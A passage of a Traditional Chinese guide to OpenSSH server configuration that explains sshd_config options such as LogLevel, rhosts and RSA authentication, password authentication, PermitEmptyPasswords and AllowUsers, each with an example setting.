「LogLevel」設置記錄sshd日誌消息的層次。INFO是一個好的選擇。查看sshd的man幫助頁，已獲取更多的信息。

RhostsAuthentication no

「RhostsAuthentication」設置只用rhosts或「/etc/hosts.equiv」進行安全驗證是否已經足夠了。

RhostsRSAAuthentication no

「RhostsRSA」設置是否允許用rhosts或「/etc/hosts.equiv」加上RSA進行安全驗證。

RSAAuthentication yes

「RSAAuthentication」設置是否允許只有RSA安全驗證。

PasswordAuthentication yes

「PasswordAuthentication」設置是否允許口令驗證。

PermitEmptyPasswords no

「PermitEmptyPasswords」設置是否允許用口令為空的帳號登錄。

AllowUsers admin

「AllowUsers」的後面可以跟著任意的數量的用戶名的匹配串（patterns）或user@host這樣的匹配串，這些字元串用空格隔開。主機名可以是DNS名或IP地址。